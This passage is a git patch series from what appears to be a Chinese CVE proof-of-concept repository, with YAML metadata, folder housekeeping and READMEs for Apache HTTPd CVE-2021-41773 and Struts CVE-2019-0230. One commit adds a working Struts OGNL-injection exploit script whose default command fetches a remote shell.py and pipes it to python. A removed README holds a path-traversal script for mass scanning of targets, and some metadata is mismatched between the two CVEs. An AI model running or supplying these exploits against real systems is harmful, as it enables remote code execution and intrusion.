monster,若未经修改,则攻击者可利用该cookie连接epmd,在知道fqdn的情况下执行任意代码,控制服务器。 + 2021年10月8日Apache HTTPd官方发布安全更新,披露CVE-2021-41773 Apache HTTPd 2.4.49 路径穿越漏洞。攻击者利用这个漏洞,可以读取到Apache服务器web目录以外的其他文件,或读取web中的脚本源码,如果服务器开启CGI或cgid服务,攻击者可进行任意代码执行。 scope-of-influence: apache-CouchDB < 3.2.2 reference: -- Gitee From 976832e463a54ca3b628e964ee51e9672dc2b88e Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 07:02:06 +0000 Subject: [PATCH 28/54] update cve/apache-HTTP Server/2021/yaml/CVE-2021-41773.yaml. Signed-off-by: fanyunpeng --- .../2021/yaml/CVE-2021-41773.yaml | 18 +++++------------- 1 file changed, 5 insertions(+), 13 deletions(-) diff --git a/cve/apache-HTTP Server/2021/yaml/CVE-2021-41773.yaml b/cve/apache-HTTP Server/2021/yaml/CVE-2021-41773.yaml index 66d2294f..b9e4b71d 100644 --- a/cve/apache-HTTP Server/2021/yaml/CVE-2021-41773.yaml +++ b/cve/apache-HTTP Server/2021/yaml/CVE-2021-41773.yaml @@ -6,22 +6,14 @@ info: description: 2021年10月8日Apache HTTPd官方发布安全更新,披露CVE-2021-41773 Apache HTTPd 2.4.49 路径穿越漏洞。攻击者利用这个漏洞,可以读取到Apache服务器web目录以外的其他文件,或读取web中的脚本源码,如果服务器开启CGI或cgid服务,攻击者可进行任意代码执行。 scope-of-influence: - apache-CouchDB < 3.2.2 + Apache HTTP Server = 2.4.49 reference: - - http://packetstormsecurity.com/files/167032/Apache-CouchDB-3.2.1-Remote-Code-... - - http://packetstormsecurity.com/files/169702/Apache-CouchDB-Erlang-Remote-Code... - - http://www.openwall.com/lists/oss-security/2022/04/26/1 - - http://www.openwall.com/lists/oss-security/2022/05/09/1 - - http://www.openwall.com/lists/oss-security/2022/05/09/2 - - http://www.openwall.com/lists/oss-security/2022/05/09/3 - - http://www.openwall.com/lists/oss-security/2022/05/09/4 - - https://docs.couchdb.org/en/3.2.2/setup/cluster.html - - https://lists.apache.org/thread/w24wo0h8nlctfps65txvk0oc5hdcnv00 - - https://medium.com/@_sadshade/couchdb-erlang-and-cookies-rce-on-default-setti... - - https://www.openwall.com/lists/oss-security/2022/04/26/1 + - https://apache.org/ + - https://www.exploit-db.com/exploits/50383 + - https://blog.csdn.net/qq_48985780/article/details/120973100 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 + cvss-score: 4.3 cve-id: CVE-2022-24706 cwe-id: CWE-1188 cnvd-id: None -- Gitee From e23a8933856f4f0967c5cd152f9d8ffab6bbb2d5 Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 07:10:33 +0000 Subject: [PATCH 29/54] update cve/apache-HTTP Server/2021/yaml/CVE-2021-41773.yaml. Signed-off-by: fanyunpeng --- .../2021/yaml/CVE-2021-41773.yaml | 17 ++++++++++------- 1 file changed, 10 insertions(+), 7 deletions(-) diff --git a/cve/apache-HTTP Server/2021/yaml/CVE-2021-41773.yaml b/cve/apache-HTTP Server/2021/yaml/CVE-2021-41773.yaml index b9e4b71d..420c8e1a 100644 --- a/cve/apache-HTTP Server/2021/yaml/CVE-2021-41773.yaml +++ b/cve/apache-HTTP Server/2021/yaml/CVE-2021-41773.yaml @@ -11,14 +11,17 @@ info: - https://apache.org/ - https://www.exploit-db.com/exploits/50383 - https://blog.csdn.net/qq_48985780/article/details/120973100 + - https://www.oracle.com/security-alerts/cpujan2022.html + - http://packetstormsecurity.com/files/164941/Apache-HTTP-Server-2.4.50-Remote-Code-Execution.html + - http://www.openwall.com/lists/oss-security/2021/10/08/1 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 4.3 - cve-id: CVE-2022-24706 - cwe-id: CWE-1188 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2021-41773 + cwe-id: CWE-22 cnvd-id: None kve-id: None tags: - - 不安全的默认资源初始化 - - 弱口令要求 - - 远程代码执行 \ No newline at end of file + - Apache HTTP Serve + - 路径穿越 + - 任意文件读取 -- Gitee From 033e518031b80b4f63df924637cd64d59e812c27 Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 07:16:37 +0000 Subject: [PATCH 30/54] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/apache-HTTP=20Server/2021/yaml/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-HTTP Server/2021/yaml/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/apache-HTTP Server/2021/yaml/.keep diff --git a/cve/apache-HTTP Server/2021/yaml/.keep b/cve/apache-HTTP Server/2021/yaml/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From c0255b9c95a4701388cb234e7b1682cde752765b Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 07:28:42 +0000 Subject: [PATCH 31/54] =?UTF-8?q?=E9=87=8D=E5=91=BD=E5=90=8D=20cve/apache-?= =?UTF-8?q?HTTP=20Server/2021=20=E4=B8=BA=20cve/apache-HTTP=20Server/2019?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../{2021 => 2019}/CVE-2021-41773/CVE-2021-41773.sh | 0 cve/apache-HTTP Server/{2021 => 2019}/CVE-2021-41773/README.md | 0 cve/apache-HTTP Server/{2021 => 2019}/yaml/CVE-2021-41773.yaml | 0 3 files changed, 0 insertions(+), 0 deletions(-) rename cve/apache-HTTP Server/{2021 => 2019}/CVE-2021-41773/CVE-2021-41773.sh (100%) rename cve/apache-HTTP Server/{2021 => 2019}/CVE-2021-41773/README.md (100%) rename cve/apache-HTTP Server/{2021 => 2019}/yaml/CVE-2021-41773.yaml (100%) diff --git a/cve/apache-HTTP Server/2021/CVE-2021-41773/CVE-2021-41773.sh b/cve/apache-HTTP Server/2019/CVE-2021-41773/CVE-2021-41773.sh similarity index 100% rename from cve/apache-HTTP Server/2021/CVE-2021-41773/CVE-2021-41773.sh rename to cve/apache-HTTP Server/2019/CVE-2021-41773/CVE-2021-41773.sh diff --git a/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md b/cve/apache-HTTP Server/2019/CVE-2021-41773/README.md similarity index 100% rename from cve/apache-HTTP Server/2021/CVE-2021-41773/README.md rename to cve/apache-HTTP Server/2019/CVE-2021-41773/README.md diff --git a/cve/apache-HTTP Server/2021/yaml/CVE-2021-41773.yaml b/cve/apache-HTTP Server/2019/yaml/CVE-2021-41773.yaml similarity index 100% rename from cve/apache-HTTP Server/2021/yaml/CVE-2021-41773.yaml rename to cve/apache-HTTP Server/2019/yaml/CVE-2021-41773.yaml -- Gitee From 3baf25c017ef559561d22630315896231e9e2105 Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 07:30:15 +0000 Subject: [PATCH 32/54] add cve/apache-Struts. Signed-off-by: fanyunpeng --- cve/apache-Struts | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/apache-Struts diff --git a/cve/apache-Struts b/cve/apache-Struts new file mode 100644 index 00000000..e69de29b -- Gitee From f06841a36b64e308e30b56018085dfe4e20c227b Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 07:30:23 +0000 Subject: [PATCH 33/54] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/apache-Struts?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-Struts | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/apache-Struts diff --git a/cve/apache-Struts b/cve/apache-Struts deleted file mode 100644 index e69de29b..00000000 -- Gitee From fdf6755df25f66931206dacae20e44a64886a157 Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 07:30:34 +0000 Subject: [PATCH 34/54] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20apache-Struts?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-Struts/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/apache-Struts/.keep diff --git a/cve/apache-Struts/.keep b/cve/apache-Struts/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 3d6d030f3adf68a0004164971c8ed6b6b94b31f6 Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 07:31:10 +0000 Subject: [PATCH 35/54] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20CVE-2019-0230?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-Struts/CVE-2019-0230/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/apache-Struts/CVE-2019-0230/.keep diff --git a/cve/apache-Struts/CVE-2019-0230/.keep b/cve/apache-Struts/CVE-2019-0230/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From e1e2b851f830910188e6980bd567f708b885ea58 Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 07:31:35 +0000 Subject: [PATCH 36/54] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20yaml?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-Struts/yaml/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/apache-Struts/yaml/.keep diff --git a/cve/apache-Struts/yaml/.keep b/cve/apache-Struts/yaml/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 07512f6c3f28da06f22e750b70c99fe298100f99 Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 07:31:46 +0000 Subject: [PATCH 37/54] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/apache-Struts/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-Struts/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/apache-Struts/.keep diff --git a/cve/apache-Struts/.keep b/cve/apache-Struts/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From 148d51a09e8cad2174db022ea26f4ef12045c269 Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 07:32:04 +0000 Subject: [PATCH 38/54] =?UTF-8?q?=E6=96=B0=E5=BB=BA=202019?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-Struts/2019/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/apache-Struts/2019/.keep diff --git a/cve/apache-Struts/2019/.keep b/cve/apache-Struts/2019/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 6e3d27828b5b81d7173bba34b6620dfc0c7ba66d Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 07:32:27 +0000 Subject: [PATCH 39/54] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20CVE-2019-0230?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-Struts/2019/CVE-2019-0230/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/apache-Struts/2019/CVE-2019-0230/.keep diff --git a/cve/apache-Struts/2019/CVE-2019-0230/.keep b/cve/apache-Struts/2019/CVE-2019-0230/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 6395950469b24b6a362414f60109c9f328545db4 Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 07:32:35 +0000 Subject: [PATCH 40/54] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20yaml?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-Struts/2019/CVE-2019-0230/yaml/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/apache-Struts/2019/CVE-2019-0230/yaml/.keep diff --git a/cve/apache-Struts/2019/CVE-2019-0230/yaml/.keep b/cve/apache-Struts/2019/CVE-2019-0230/yaml/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From df97b3e50891123cb39cf71049a954fcb1a0a504 Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 07:32:55 +0000 Subject: [PATCH 41/54] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/apache-Struts/CVE-2019-0230/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-Struts/CVE-2019-0230/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/apache-Struts/CVE-2019-0230/.keep diff --git a/cve/apache-Struts/CVE-2019-0230/.keep b/cve/apache-Struts/CVE-2019-0230/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From 762792219c84ace85cd1d612c60df1df0d88feea Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 07:33:09 +0000 Subject: [PATCH 42/54] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/apache-Struts/yaml?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-Struts/yaml/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/apache-Struts/yaml/.keep diff --git a/cve/apache-Struts/yaml/.keep b/cve/apache-Struts/yaml/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From 65fd595c5ca933fa24fea4b01648bbef0c53e646 Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 07:33:32 +0000 Subject: [PATCH 43/54] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20yaml?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-Struts/2019/yaml/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/apache-Struts/2019/yaml/.keep diff --git a/cve/apache-Struts/2019/yaml/.keep b/cve/apache-Struts/2019/yaml/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 466f934d816f6fff30780f1ca221483e84601d27 Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 07:33:43 +0000 Subject: [PATCH 44/54] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/apache-Struts/2019/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-Struts/2019/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/apache-Struts/2019/.keep diff --git a/cve/apache-Struts/2019/.keep b/cve/apache-Struts/2019/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From 4a9afee961d43128a1fda3047c74a37dab18787e Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 07:35:13 +0000 Subject: [PATCH 45/54] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/apache-Struts/2019/CVE-2019-0230/yaml?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-Struts/2019/CVE-2019-0230/yaml/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/apache-Struts/2019/CVE-2019-0230/yaml/.keep diff --git a/cve/apache-Struts/2019/CVE-2019-0230/yaml/.keep b/cve/apache-Struts/2019/CVE-2019-0230/yaml/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From e32332b79ca0f793ceb583c551217272253f7699 Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 07:35:40 +0000 Subject: [PATCH 46/54] Poc Signed-off-by: fanyunpeng --- .../2019/CVE-2019-0230/CVE-2019-0230.py | 163 ++++++++++++++++++ 1 file changed, 163 insertions(+) create mode 100644 cve/apache-Struts/2019/CVE-2019-0230/CVE-2019-0230.py diff --git a/cve/apache-Struts/2019/CVE-2019-0230/CVE-2019-0230.py b/cve/apache-Struts/2019/CVE-2019-0230/CVE-2019-0230.py new file mode 100644 index 00000000..1551ebac --- /dev/null +++ b/cve/apache-Struts/2019/CVE-2019-0230/CVE-2019-0230.py @@ -0,0 +1,163 @@ +# Exploit Title: Apache Struts 2.5.20 - Double OGNL evaluation +# Date: 08/18/2020 +# Exploit Author: West Shepherd +# Vendor Homepage: https://struts.apache.org/download.cgi +# Version: Struts 2.0.0 - Struts 2.5.20 (S2-059) +# CVE : CVE-2019-0230 +# Credit goes to reporters Matthias Kaiser, Apple InformationSecurity, and the Github example from PrinceFPF. +# Source(s): +# https://github.com/PrinceFPF/CVE-2019-0230 +# https://cwiki.apache.org/confluence/display/WW/S2-059 +# *Fix it, upgrade to: https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.5.22 + +# !/usr/bin/python +from sys import argv, exit, stdout, stderr +import argparse +import requests +from requests.packages.urllib3.exceptions import InsecureRequestWarning +import logging + + +class Exploit: + def __init__( + self, + target='', + redirect=False, + proxy_address='' + ): + requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + self.target = target + self.session = requests.session() + self.redirect = redirect + self.timeout = 0.5 + self.proxies = { + 'http': 'http://%s' % proxy_address, + 'https': 'http://%s' % proxy_address + } \ + if proxy_address is not None \ + and proxy_address != '' else {} + self.query_params = {} + self.form_values = {} + self.cookies = {} + boundary = "---------------------------735323031399963166993862150" + self.headers = { + 'Content-Type': 'multipart/form-data; boundary=%s' % boundary, + 'Accept': '*/*', + 'Connection': 'close' + } + payload = "%{(#nike='multipart/form-data')." \ + "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)." \ + "(#_memberAccess?(#_memberAccess=#dm):" \ + +"((#container=#context['com.opensymphony.xwork2.ActionContext.container'])." +\ + +"(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))." +\ + "(#ognlUtil.getExcludedPackageNames().clear())." \ + "(#ognlUtil.getExcludedClasses().clear())." \ + "(#context.setMemberAccess(#dm)))).(#cmd='{COMMAND}')." \ + +"(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))." +\ + +"(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))." \ + "(#p=new +java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true))." \ + +"(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse()." +\ + +"getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))." +\ + "(#ros.flush())}" + + self.payload = "--%s\r\nContent-Disposition: form-data; +name=\"foo\"; " \ + "filename=\"%s\0b\"\r\nContent-Type: +text/plain\r\n\r\nx\r\n--%s--\r\n\r\n" % ( + boundary, payload, boundary + ) + + def do_get(self, url, params=None, data=None): + return self.session.get( + url=url, + verify=False, + allow_redirects=self.redirect, + headers=self.headers, + cookies=self.cookies, + proxies=self.proxies, + data=data, + params=params + ) + + def do_post(self, url, data=None, params=None): + return self.session.post( + url=url, + data=data, + verify=False, + allow_redirects=self.redirect, + headers=self.headers, + cookies=self.cookies, + proxies=self.proxies, + params=params + ) + + def debug(self): + try: + import http.client as http_client + except ImportError: + import httplib as http_client + http_client.HTTPConnection.debuglevel = 1 + logging.basicConfig() + logging.getLogger().setLevel(logging.DEBUG) + requests_log = logging.getLogger("requests.packages.urllib3") + requests_log.setLevel(logging.DEBUG) + requests_log.propagate = True + return self + + def send_payload(self, command='curl --insecure -sv +https://10.10.10.10/shell.py|python -'): + url = self.target + stdout.write('sending payload to %s payload %s' % (url, command)) + resp = self.do_post(url=url, params=self.query_params, +data=self.payload.replace('{COMMAND}', command)) + return resp + + +if __name__ == '__main__': + parser = argparse.ArgumentParser(add_help=True, + description='CVE-2020-0230 Struts +2 exploit') + try: + parser.add_argument('-target', action='store', help='Target +address: http(s)://target.com/index.action') + parser.add_argument('-command', action='store', + help='Command to execute: touch /tmp/pwn') + parser.add_argument('-debug', action='store', default=False, +help='Enable debugging: False') + parser.add_argument('-proxy', action='store', default='', +help='Enable proxy: 10.10.10.10:8080') + + if len(argv) == 1: + parser.print_help() + exit(1) + options = parser.parse_args() + + exp = Exploit( + proxy_address=options.proxy, + target=options.target + ) + + if options.debug: + exp.debug() + stdout.write('target %s debug %s proxy %s\n' % ( + options.target, options.debug, options.proxy + )) + + result = exp.send_payload(command=options.command) + stdout.write('Response: %d\n' % result.status_code) + + except Exception as error: + +stderr.write('error in main %s' % str(error)) \ No newline at end of file -- Gitee From 59e3d7ee18872df945d5c863b20ac6e5de7fa92e Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 07:35:45 +0000 Subject: [PATCH 47/54] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/apache-Struts/2019/CVE-2019-0230/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-Struts/2019/CVE-2019-0230/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/apache-Struts/2019/CVE-2019-0230/.keep diff --git a/cve/apache-Struts/2019/CVE-2019-0230/.keep b/cve/apache-Struts/2019/CVE-2019-0230/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From 57b19b974e6e9f89f19480de5b1d260041bce0c9 Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 07:39:14 +0000 Subject: [PATCH 48/54] add cve/apache-Struts/2019/CVE-2019-0230/README.md. Signed-off-by: fanyunpeng --- .../2019/CVE-2019-0230/README.md | 25 +++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 cve/apache-Struts/2019/CVE-2019-0230/README.md diff --git a/cve/apache-Struts/2019/CVE-2019-0230/README.md b/cve/apache-Struts/2019/CVE-2019-0230/README.md new file mode 100644 index 00000000..827fdd49 --- /dev/null +++ b/cve/apache-Struts/2019/CVE-2019-0230/README.md @@ -0,0 +1,25 @@ +# Apache Struts 2.5.20 - Double OGNL evaluation +Exploit Author: Lucas Souza https://lsass.io +Vendor Homepage: https://apache.org/ +Version: 2.4.49 +Tested on: 2.4.49 +CVE : CVE-2019-0230 +Credits: Ash Daulton and the cPanel Security Team +``` +#!/bin/bash + +if [[ $1 == '' ]]; [[ $2 == '' ]]; then +echo Set [TAGET-LIST.TXT] [PATH] [COMMAND] +echo ./PoC.sh targets.txt /etc/passwd +exit +fi +for host in $(cat $1); do +echo $host +curl -s --path-as-is -d "echo Content-Type: text/plain; echo; $3" "$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e$2"; done +``` +# Usage +``` +PoC.sh targets.txt /etc/passwd +PoC.sh targets.txt /bin/sh whoami +``` + -- Gitee From b8187eaf3ca32705399473a3e40ab2db0537d359 Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 07:47:59 +0000 Subject: [PATCH 49/54] add cve/apache-Struts/2019/yaml/CVE-2019-0230.yaml. Signed-off-by: fanyunpeng --- .../2019/yaml/CVE-2019-0230.yaml | 24 +++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 cve/apache-Struts/2019/yaml/CVE-2019-0230.yaml diff --git a/cve/apache-Struts/2019/yaml/CVE-2019-0230.yaml b/cve/apache-Struts/2019/yaml/CVE-2019-0230.yaml new file mode 100644 index 00000000..c2ef97a2 --- /dev/null +++ b/cve/apache-Struts/2019/yaml/CVE-2019-0230.yaml @@ -0,0 +1,24 @@ +id: CVE-2019-0230 +source: https://www.exploit-db.com/exploits/49068 +info: + name: Apache Struts是一个用于构建基于Java的web应用程序的模型-视图-控制器(MVC)框架。 + severity: critical + description: + Apache Struts框架, 会对某些特定的标签的属性值,比如id属性进行二次解析,所以攻击者可以传递将在呈现标签属性时再次解析OGNL表达式,造成OGNL表达式注入。从而可能造成远程执行代码。 + scope-of-influence: + Struts 2.0.0 - Struts 2.5.20 + reference: + - http://packetstormsecurity.com/files/160108/Apache-Struts-2.5.20-Double-OGNL-Evaluation.html + - https://cwiki.apache.org/confluence/display/ww/s2-059 + - http://packetstormsecurity.com/files/160721/Apache-Struts-2-Forced-Multi-OGNL-Evaluation.html + - https://launchpad.support.sap.com/#/notes/2982840 + - https://www.oracle.com/security-alerts/cpuApr2021.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2019-0230 + cwe-id: CWE-1321 + cnvd-id: None + kve-id: None + tags: + - 远程命令执行 \ No newline at end of file -- Gitee From 049961afc304e20f6d4e52b78d3c0925e5c830ae Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 07:48:31 +0000 Subject: [PATCH 50/54] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/apache-Struts/2019/yaml/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-Struts/2019/yaml/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/apache-Struts/2019/yaml/.keep diff --git a/cve/apache-Struts/2019/yaml/.keep b/cve/apache-Struts/2019/yaml/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From fd548d6425354757b72e5af8f2823ad1ee49b8d7 Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 07:55:25 +0000 Subject: [PATCH 51/54] update cve/apache-Struts/2019/CVE-2019-0230/README.md. Signed-off-by: fanyunpeng --- .../2019/CVE-2019-0230/README.md | 28 ++++++++----------- 1 file changed, 12 insertions(+), 16 deletions(-) diff --git a/cve/apache-Struts/2019/CVE-2019-0230/README.md b/cve/apache-Struts/2019/CVE-2019-0230/README.md index 827fdd49..c456e869 100644 --- a/cve/apache-Struts/2019/CVE-2019-0230/README.md +++ b/cve/apache-Struts/2019/CVE-2019-0230/README.md @@ -5,21 +5,17 @@ Version: 2.4.49 Tested on: 2.4.49 CVE : CVE-2019-0230 Credits: Ash Daulton and the cPanel Security Team -``` -#!/bin/bash - -if [[ $1 == '' ]]; [[ $2 == '' ]]; then -echo Set [TAGET-LIST.TXT] [PATH] [COMMAND] -echo ./PoC.sh targets.txt /etc/passwd -exit -fi -for host in $(cat $1); do -echo $host -curl -s --path-as-is -d "echo Content-Type: text/plain; echo; $3" "$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e$2"; done -``` # Usage -``` -PoC.sh targets.txt /etc/passwd -PoC.sh targets.txt /bin/sh whoami -``` +''' +python CVE-2019-0230.py + +-target : Target address +-command : Command to execute +-debug : Enable debugging +-proxy : Enable proxy +# reference +http://packetstormsecurity.com/files/160108/Apache-Struts-2.5.20-Double-OGNL-Evaluation.html +http://packetstormsecurity.com/files/160721/Apache-Struts-2-Forced-Multi-OGNL-Evaluation.html +https://cwiki.apache.org/confluence/display/ww/s2-059 +https://launchpad.support.sap.com/#/notes/2982840 +https://www.oracle.com/security-alerts/cpujan2021.html -- Gitee From 336043f0e73a79a956d2a126f1e33dbdd8eb5617 Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 07:55:51 +0000 Subject: [PATCH 52/54] update cve/apache-Struts/2019/CVE-2019-0230/README.md. Signed-off-by: fanyunpeng --- cve/apache-Struts/2019/CVE-2019-0230/README.md | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/cve/apache-Struts/2019/CVE-2019-0230/README.md b/cve/apache-Struts/2019/CVE-2019-0230/README.md index c456e869..170d45b5 100644 --- a/cve/apache-Struts/2019/CVE-2019-0230/README.md +++ b/cve/apache-Struts/2019/CVE-2019-0230/README.md @@ -3,15 +3,16 @@ Exploit Author: Lucas Souza https://lsass.io Vendor Homepage: https://apache.org/ Version: 2.4.49 Tested on: 2.4.49 -CVE : CVE-2019-0230 +CVE : CVE-2019-0230 Credits: Ash Daulton and the cPanel Security Team # Usage -''' +``` python CVE-2019-0230.py + -target : Target address -command : Command to execute -debug : Enable debugging -proxy : Enable proxy +``` # reference http://packetstormsecurity.com/files/160108/Apache-Struts-2.5.20-Double-OGNL-Evaluation.html http://packetstormsecurity.com/files/160721/Apache-Struts-2-Forced-Multi-OGNL-Evaluation.html -- Gitee From 3c6489707b27d9f75d6432708511c3fc3618728b Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 07:56:15 